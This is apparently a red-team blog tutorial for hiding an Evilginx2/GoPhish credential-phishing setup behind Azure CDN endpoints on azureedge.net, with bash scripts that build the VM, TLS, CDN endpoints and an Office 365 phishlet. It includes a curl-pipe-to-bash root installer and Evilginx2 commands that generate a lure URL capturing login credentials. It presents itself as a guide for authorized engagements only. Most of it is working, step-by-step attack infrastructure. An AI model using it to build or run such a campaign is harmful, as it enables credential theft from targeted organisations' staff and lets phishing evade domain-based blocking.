Whether you stumbled across this post *by accident* or you need to create a good phishing campaign, I am here to help you with all that and a bag of chips!
This article aims to teach Offensive teams how to mask their phishing infrastructure using a Content Delivery Network (CDN) in Azure. The setup itself is very easy, but understanding how it works may be more convoluted. Let me walk you through the steps of creating a virtual machine in Azure to send out a phishing email.
I shall not be responsible or liable for any misuse or illegitimate use of this guide. It is only to be used in authorized penetration testing or red team engagements where the operators have been given explicit written permission to carry out social engineering.
A word of warning! This article is not an in-depth guide and will not:
- Explain the detailed networking of a CDN.
- Explain how Apache2 works.
- Explain how tmux works.
- Show you how to set up a phishing campaign.
- Show you how to set up an SMTP relay (e.g. Mailgun).
First things first, we want to set up a virtual machine in Azure. The reason we use Azure is that the VM gets a public DNS name of the form YOURDNSNAME.eastus.cloudapp.azure.com, and that name is enough to obtain an SSL certificate from Let's Encrypt without registering a domain of our own:
certbot certonly --register-unsafely-without-email -d YOURDNSNAME.eastus.cloudapp.azure.com
Let's get started:
- 1. Create the VM from a Debian or Ubuntu image with SSH public-key authentication and keep the private key; the default username is azureuser.
- 2. Go to the resource you just created and click the "Public IP Address" link (in the "Essentials" section of the resource). This is also where you set the DNS name label that gives the VM its YOURDNSNAME.eastus.cloudapp.azure.com hostname.
- 3. Lastly, let's access the virtual machine you just created!
- 4. In a bash console (or PowerShell), SSH into it, replacing [ip-address] with the public IP address of your virtual machine:
ssh -L 3333:localhost:3333 azureuser@[ip-address]
The -L option forwards local port 3333 to the VM, so the GoPhish admin interface (which listens on 127.0.0.1:3333) is reachable at https://localhost:3333 without opening that port to the internet.
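The same VM can be stood up from the Azure CLI, which is handy when you rebuild infrastructure per engagement. This is an added example, not part of the original article: the resource group, region, image, size and DNS label are placeholders (assumed values), and the only thing it enforces beyond the portal steps is that the DNS label follows Azure's naming rule, so the cloudapp.azure.com name exists before you ask certbot for a certificate.

```shell
#!/usr/bin/env bash
# Added example (not from the article): create the Azure VM with the CLI.
# Every value below is an assumption to adjust for your engagement.
set -eu

RG="${RG:-rt-phish-rg}"
LOCATION="${LOCATION:-eastus}"
VM_NAME="${VM_NAME:-phish-vm}"
DNS_LABEL="${DNS_LABEL:-yourdnsname}"   # becomes <label>.<region>.cloudapp.azure.com
ADMIN_USER="${ADMIN_USER:-azureuser}"   # the default user named in the article
IMAGE="${IMAGE:-Ubuntu2204}"            # the installer is only tested on Debian/Ubuntu

# Public DNS name Azure derives from a DNS label and a region; this is the
# name you hand to certbot later.
vm_fqdn() {
    printf '%s.%s.cloudapp.azure.com\n' "$1" "$2"
}

# The SSH command from the article: local port 3333 is forwarded to the VM so
# the GoPhish admin UI (bound to 127.0.0.1:3333) is reachable without opening it.
ssh_cmd() {
    printf 'ssh -L 3333:localhost:3333 %s@%s\n' "$1" "$2"
}

# Azure DNS labels: lowercase letters, digits and hyphens, first character a
# letter, last a letter or digit, 3-63 characters. Checked before any API call
# so a typo does not cost you a VM rebuild.
valid_dns_label() {
    printf '%s' "$1" | grep -Eq '^[a-z][a-z0-9-]{1,61}[a-z0-9]$'
}

deploy() {
    valid_dns_label "$DNS_LABEL" || { echo "invalid DNS label: $DNS_LABEL" >&2; return 1; }
    az group create -n "$RG" -l "$LOCATION" -o none
    az vm create -g "$RG" -n "$VM_NAME" \
        --image "$IMAGE" --size Standard_B2s \
        --admin-username "$ADMIN_USER" --generate-ssh-keys \
        --public-ip-sku Standard \
        --public-ip-address-dns-name "$DNS_LABEL" -o none
    # Inbound: 22 is opened by az vm create; 80 is for certbot's standalone
    # challenge and 443 is the CDN origin. 3333 stays closed (use the tunnel).
    az vm open-port -g "$RG" -n "$VM_NAME" --port 80 --priority 1010 -o none
    az vm open-port -g "$RG" -n "$VM_NAME" --port 443 --priority 1020 -o none
    ip="$(az vm show -d -g "$RG" -n "$VM_NAME" --query publicIps -o tsv)"
    echo "FQDN for certbot: $(vm_fqdn "$DNS_LABEL" "$LOCATION")"
    echo "Connect with:     $(ssh_cmd "$ADMIN_USER" "$ip")"
}

# Run as: ./azure-vm.sh deploy   (the functions can also be sourced for reuse)
if [ "${1:-}" = "deploy" ]; then deploy; fi
```

Only 22, 80 and 443 are opened on purpose: 80 is needed just long enough for the HTTP-01 challenge, and the GoPhish admin port never needs to be reachable from outside because of the SSH tunnel.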
Full credit for this section goes to Fin3ss3g0d for the beautiful EvilGoPhish tool! It automates the process of making GoPhish, Evilginx2, and Apache flow together. Luckily for you, I've created a one-liner that streamlines this process and gives some nice prompts!
!!WARNING: THIS HAS ONLY BEEN TESTED ON DEBIAN AND UBUNTU IMAGES!!
Let's get started!
- 1. From the bash shell, run:
curl -sSL https://raw.githubusercontent.com/stevesec/egp_basicinstall/main/basic_install.sh | bash
- 1. Make sure you are the root user! The script detects whether you are root or in the sudoers group. Note that this pipes a script straight into a root shell; if you would rather review it first, download it with curl, read it, and then run it.
- 2. Hit "Enter" through the prompts until you reach the "root domain" prompt, and enter azureedge.net; we will be using this later!
- 3. After the root domain prompt, enter your subdomains, separated by a space and with target replaced by the name of your target organization (e.g. target-login target-account, the names used for the CDN endpoints below):
- 1. Note these for later!
- 2. Ensure that they end in "-login" and "-account" respectively, or this process will not work (the phishlet's two proxy hosts, login and account, get mapped to these names later).
- 4. Then enter your redirect URL (a good rule of thumb is to base it on the target's infrastructure, e.g. the Office 365 or Google account login page).
- 5. Enter the RID you want to use, the value that replaces GoPhish's default rid tracking parameter in lure URLs (this may be expanded on in the future); testing is required for the Rule Engine implementation.
- 6. The next couple of prompts are user preference:
- 1. Proxying for the root domain should be "no", as we do not own azureedge.net.
- 2. Enabling the Live Feed opens a feed on port 1337.
- 3. Enabling the Apache Blacklist installs a blacklist of IP addresses for the web server to reject.
- 7. If you're satisfied with your "User Settings", click "Yes". If not, click "Edit Settings".
- 8. If you want to use Mailgun, there is a prompt for setting that up; if not, click "No".
- 9. The setup process begins, and EvilGoPhish is installed under /etc/.evilgophish/.
Remember the DNS name label YOURDNSNAME.eastus.cloudapp.azure.com from the VM setup? You're going to need it now!
- 1. In the bash shell, type the following, replacing YOURDNSNAME.eastus.cloudapp.azure.com with the name you created above:
certbot certonly --register-unsafely-without-email -d YOURDNSNAME.eastus.cloudapp.azure.com
- 2. Select option 1 (standalone) in the prompt, which spins up a temporary web server on port 80 for the HTTP-01 challenge; port 80 must therefore be allowed inbound in the VM's network security group and be free on the host.
- 3. Follow the prompts, making sure to agree with the Terms of Service.
- 1. If this step fails, check your listening ports with:
netstat -tulpn
Apache2 (started by the installer) is probably already bound to port 80; stop it, run certbot again, and start it afterwards.
- 4. If all goes well, you should have a nice, shiny, new certificate from Let's Encrypt! Note the paths certbot prints for the certificate (fullchain.pem) and the private key (privkey.pem); you need them next.
Let's stick that in the enabled sites:
- 1. Edit with your favorite text editor 😉
nano /etc/apache2/sites-enabled/000-default.conf
and enter the certificate and key paths in the SSLCertificateFile and SSLCertificateKeyFile directives.
- 2. If all goes well here, you should be able to restart Apache:
systemctl restart apache2.service
- 1. NOTE: Apache2 will show up in netstat as listening on IPv6 :::443. To bind it explicitly to IPv4 instead, change the Listen 443 line in:
/etc/apache2/ports.conf
to Listen 0.0.0.0:443, and it should then be listening on IPv4 0.0.0.0:443. On Linux the :::443 socket already accepts IPv4 connections as well (unless net.ipv6.bindv6only is set), so this is optional, but it makes the listener unambiguous.
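Putting the certificate step and the two Apache edits into one script, as an added example that is not from the article or from EvilGoPhish: it refuses to run certbot while something else holds port 80 (the failure mode described above), requests the certificate non-interactively, points the site's certificate directives at certbot's live directory, and makes the 443 listener explicit. The config paths are Debian/Ubuntu defaults and the FQDN is a placeholder; the directive names it edits are the standard Apache ones, but check them against what the installer actually wrote into your 000-default.conf.

```shell
#!/usr/bin/env bash
# Added example (not from the article or EvilGoPhish): certbot + Apache wiring.
# Paths are Debian/Ubuntu defaults; FQDN is a placeholder to replace.
set -eu

FQDN="${FQDN:-YOURDNSNAME.eastus.cloudapp.azure.com}"
PORTS_CONF="${PORTS_CONF:-/etc/apache2/ports.conf}"
SITE_CONF="${SITE_CONF:-/etc/apache2/sites-enabled/000-default.conf}"

# True if something already listens on TCP port $1 (IPv4 or IPv6).
# certbot --standalone needs :80; Apache started by the installer usually has it.
port_in_use() {
    ss -ltn 2>/dev/null | awk 'NR > 1 {print $4}' | grep -Eq ":$1\$"
}

# Rewrite every bare "Listen 443" in ports.conf to "Listen 0.0.0.0:443" (the
# article's IPv4 step). On Linux a bare Listen 443 yields a dual-stack :::443
# socket that already takes IPv4, so this is optional; skip it if you want
# IPv6 clients to reach the origin.
fix_ssl_listen() {
    conf="$1"
    sed -i -E 's/^([[:space:]]*)Listen[[:space:]]+443[[:space:]]*$/\1Listen 0.0.0.0:443/' "$conf"
    grep -Eq '^[[:space:]]*Listen[[:space:]]+0\.0\.0\.0:443' "$conf"
}

# Point the SSLCertificateFile / SSLCertificateKeyFile directives of $1 at
# certbot's live directory for $2, whatever values they held before, and
# verify both substitutions actually happened.
set_cert_paths() {
    conf="$1"; live="/etc/letsencrypt/live/$2"
    sed -i -E \
        -e "s#^([[:space:]]*SSLCertificateFile)[[:space:]]+.*#\1 $live/fullchain.pem#" \
        -e "s#^([[:space:]]*SSLCertificateKeyFile)[[:space:]]+.*#\1 $live/privkey.pem#" \
        "$conf"
    grep -qF "SSLCertificateFile $live/fullchain.pem" "$conf" \
        && grep -qF "SSLCertificateKeyFile $live/privkey.pem" "$conf"
}

issue_cert_and_enable() {
    if port_in_use 80; then
        echo "port 80 is busy (Apache2?): run 'systemctl stop apache2' and retry" >&2
        return 1
    fi
    # Non-interactive equivalent of choosing option 1 (standalone) and
    # agreeing to the ToS in the prompts.
    certbot certonly --standalone --non-interactive --agree-tos \
        --register-unsafely-without-email -d "$FQDN"
    fix_ssl_listen "$PORTS_CONF"
    set_cert_paths "$SITE_CONF" "$FQDN"
    apachectl configtest            # never restart on a config Apache rejects
    systemctl restart apache2.service
    ss -ltn | grep ':443 '          # should now show 0.0.0.0:443
}

# Run as: ./tls-setup.sh run   (the functions can also be sourced on their own)
if [ "${1:-}" = "run" ]; then issue_cert_and_enable; fi
```

The `apachectl configtest` before the restart is the check worth keeping even if you do the edits by hand: a typo in the certificate path leaves you with no listener on 443 at all, and the CDN will happily report the origin as down.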
Remember the subdomains you created with the bash one-liner? Let's grab those and get a move on with creating the CDN in Azure. Each subdomain becomes its own CDN endpoint, and the endpoint name is what appears in front of azureedge.net in the phishing URL.
- 1. Search for and go to "Front Door and CDN profiles" and follow the prompts:
- 1. Enter your first subdomain as the "CDN Endpoint Name" (don't worry, we'll be adding the second one shortly)
- 2. CDN Endpoint Name: target-login
- 3. Origin Type: Custom Origin
- 4. Origin hostname: the public IP address of the virtual machine
- 2. Click "Review + Create".
- 3. Go to the resource that was just created.
- 4. Click on it and then on "Origin".
- 5. Click on the entry named "origin-ip-address".
- 6. Change the "Origin host header" to the CDN endpoint name (i.e. target-login.azureedge.net). This is the Host header the CDN sends to the VM, and it must match the hostname Evilginx2 expects for that proxy host.
- 7. Click "Save".
- 8. Navigate to "Compression", turn it off, and click "Save".
- 9. Navigate to "Caching Rules", set it to "Bypass caching for query strings", and click "Save". The default ignores query strings when caching, so two lure URLs that differ only in their query string could otherwise be answered from the edge cache instead of reaching Evilginx2.
- 10. Click "+ Endpoint" to create a second endpoint:
- 1. Enter your second subdomain as the "CDN Endpoint Name".
- 2. CDN Endpoint Name: target-account
- 3. Origin Type: Custom Origin
- 4. Origin Hostname: the public IP address of the virtual machine
- 5. Origin Host Header: the CDN endpoint name (i.e. target-account.azureedge.net)
- 11. Click "Add".
- 12. Repeat steps 8 and 9 (compression off, bypass caching for query strings) for the second endpoint.
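The same two endpoints via the Azure CLI, as an added example that is not from the article. The resource group, profile name, SKU and origin IP are assumptions; the settings that matter (custom origin, origin host header equal to the endpoint's own azureedge.net name, compression off, bypass caching for query strings) mirror the portal steps above, and the endpoint names are validated before any call so that a name Azure would reject does not leave you with one endpoint of two.

```shell
#!/usr/bin/env bash
# Added example (not from the article): create the CDN endpoints with the CLI.
# Resource names, SKU and the origin IP (a documentation address) are assumptions.
set -eu

RG="${RG:-rt-phish-rg}"
PROFILE="${PROFILE:-rt-phish-cdn}"
SKU="${SKU:-Standard_Microsoft}"
ORIGIN_IP="${ORIGIN_IP:-203.0.113.10}"   # public IP of the VM
PREFIX="${PREFIX:-target}"               # organisation prefix from the installer prompt

# Hostname Azure assigns to an endpoint; this is what the victim's browser sees
# and what the phishlet's phish_sub + "azureedge.net" must equal.
endpoint_host() { printf '%s.azureedge.net\n' "$1"; }

# The two endpoint names the installer prompts expect: <prefix>-login and
# <prefix>-account, matching the phishlet's login and account proxy hosts.
endpoint_names() { printf '%s-login %s-account\n' "$1" "$1"; }

# Endpoint names are global across azureedge.net: lowercase letters, digits and
# hyphens, starting and ending with a letter or digit, at most 50 characters
# (assumed rule; adjust if the portal tells you otherwise).
valid_endpoint_name() {
    printf '%s' "$1" | grep -Eq '^[a-z0-9]([a-z0-9-]{0,48}[a-z0-9])?$'
}

create_endpoint() {
    name="$1"
    valid_endpoint_name "$name" || { echo "invalid endpoint name: $name" >&2; return 1; }
    az cdn endpoint create -g "$RG" --profile-name "$PROFILE" -n "$name" \
        --origin "$ORIGIN_IP" \
        --origin-host-header "$(endpoint_host "$name")" \
        --enable-compression false \
        --query-string-caching-behavior BypassCaching \
        -o none
}

deploy() {
    # Validate both names first so we never end up with only one endpoint.
    for n in $(endpoint_names "$PREFIX"); do
        valid_endpoint_name "$n" || { echo "invalid endpoint name: $n" >&2; return 1; }
    done
    az cdn profile create -g "$RG" -n "$PROFILE" --sku "$SKU" -o none
    for n in $(endpoint_names "$PREFIX"); do create_endpoint "$n"; done
    # Print the hostnames you will reference from Evilginx2 and GoPhish.
    az cdn endpoint list -g "$RG" --profile-name "$PROFILE" --query '[].hostName' -o tsv
}

# Run as: ./azure-cdn.sh deploy
if [ "${1:-}" = "deploy" ]; then deploy; fi
```

Once the endpoints exist, a quick sanity check from the VM is to curl the azureedge.net hostname and confirm the request arrives at Apache with a Host header of the endpoint name; if the origin host header was left at the raw IP, Evilginx2 will not recognise the proxy host.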
We will now edit the phishlet for Evilginx2 so that it uses the two subdomains we created.
- 1. Open the o365 phishlet (o3652, in the evilginx2 phishlets directory) with your favorite text editor 😉
- 2. Under "proxy_hosts":
- 1. Change "phish_sub: 'login'" to "phish_sub: 'target-login'", and
- 2. Change "phish_sub: 'account'" to "phish_sub: 'target-account'"
Each phish_sub is prefixed to the domain you configure in Evilginx2, so these become target-login.azureedge.net and target-account.azureedge.net, exactly the CDN endpoint hostnames.
Lastly, we will start up EvilGoPhish. We run Evilginx2 in developer mode: in that mode it generates its own self-signed certificate instead of trying to obtain one from Let's Encrypt for azureedge.net (which it cannot, as we do not own that domain), while Apache, which holds the certificate we obtained for the cloudapp.azure.com name, fronts it.
- 1. From the /etc/.evilgophish/ directory, navigate to the gophish directory.
- 2. Start GoPhish, noting the admin password it prints (this will need to be changed later). This also creates the gophish.db that Evilginx2 will use.
- 3. Navigate back to the evilginx2 directory.
- 4. Start Evilginx2:
./evilginx2 -g ../gophish/gophish.db -debug -developer -p phishlets/
- 1. ALWAYS use developer mode with a CDN in front.
- 2. This starts Evilginx2 in developer mode, so it does not need to obtain an SSL certificate.
- 5. Now, let's configure Evilginx2! In its console, type:
config domain azureedge.net
config ip [ip address of Virtual Machine]
phishlets hostname o3652 azureedge.net
phishlets enable o3652
lures create o3652
lures get-url 0
- 6. Use the URL that lures get-url prints as the landing page URL in your GoPhish campaign, and you should be ready to go!
- 7. If everything worked out, you now have a domain under azureedge.net that captures credentials, with the CDN edge as the only address your targets ever see.
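An added example (not part of the article or of EvilGoPhish) that does the phishlet edit above with sed and checks that it took effect for both proxy hosts before anything is launched; it then starts GoPhish and Evilginx2 in tmux sessions and feeds the console commands above into Evilginx2. The install path follows the article; the phishlet file name (o3652.yaml), the binary names, the startup delays and the use of tmux send-keys are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the article or EvilGoPhish): patch the phishlet's
# phish_sub entries, verify them, then launch GoPhish + Evilginx2 under tmux.
set -eu

EGP_DIR="${EGP_DIR:-/etc/.evilgophish}"
PHISHLET="${PHISHLET:-$EGP_DIR/evilginx2/phishlets/o3652.yaml}"   # assumed file name
PREFIX="${PREFIX:-target}"                                          # e.g. target-login
VM_IP="${VM_IP:-203.0.113.10}"                                      # for "config ip"

# Rewrite phish_sub: 'login' -> '<prefix>-login' and 'account' -> '<prefix>-account'
# in place (works for the one-line flow-style entries evilginx phishlets use),
# then fail if either subdomain is missing afterwards: that is exactly the
# situation in which the CDN hostnames can never line up with the phishlet.
# Safe to run twice; an already-prefixed entry is left alone.
rename_phish_subs() {
    file="$1"; prefix="$2"
    for sub in login account; do
        sed -i -E "s/phish_sub:[[:space:]]*'${sub}'/phish_sub: '${prefix}-${sub}'/" "$file"
        grep -Eq "phish_sub:[[:space:]]*'${prefix}-${sub}'" "$file" || {
            echo "phish_sub '${sub}' not found in $file" >&2; return 1; }
    done
}

# The hostnames Evilginx2 will serve after "phishlets hostname o3652 azureedge.net":
# every phish_sub becomes <phish_sub>.azureedge.net. Compare this list with the
# CDN endpoints you created; any mismatch means a request that never gets proxied.
phishlet_hosts() {
    sed -nE "s/.*phish_sub:[[:space:]]*'([^']+)'.*/\1.azureedge.net/p" "$1" | sort -u
}

# Start order from the article: GoPhish first (it creates gophish.db), then
# Evilginx2 in developer mode against that database. tmux keeps both running
# after the SSH session ends; send-keys types the console commands for you.
launch() {
    rename_phish_subs "$PHISHLET" "$PREFIX"
    echo "phishlet hosts (must match your CDN endpoints):"; phishlet_hosts "$PHISHLET"
    tmux new-session -d -s gophish -c "$EGP_DIR/gophish" './gophish'
    sleep 5   # let GoPhish create gophish.db and print the admin password
    tmux new-session -d -s evilginx -c "$EGP_DIR/evilginx2" \
        './evilginx2 -g ../gophish/gophish.db -debug -developer -p phishlets/'
    sleep 5   # let the evilginx console come up before typing into it
    for cmd in 'config domain azureedge.net' "config ip $VM_IP" \
               'phishlets hostname o3652 azureedge.net' 'phishlets enable o3652' \
               'lures create o3652' 'lures get-url 0'; do
        tmux send-keys -t evilginx "$cmd" Enter
    done
    echo "admin password: tmux attach -t gophish   lure URL: tmux attach -t evilginx"
}

# Run as: ./launch.sh launch
if [ "${1:-}" = "launch" ]; then launch; fi
```

The check in `rename_phish_subs` is the part worth keeping even if you edit the YAML by hand: if only one of the two proxy hosts was renamed, Evilginx2 starts cleanly, the lure URL works, and the second hostname silently 404s at the edge because no CDN endpoint matches it.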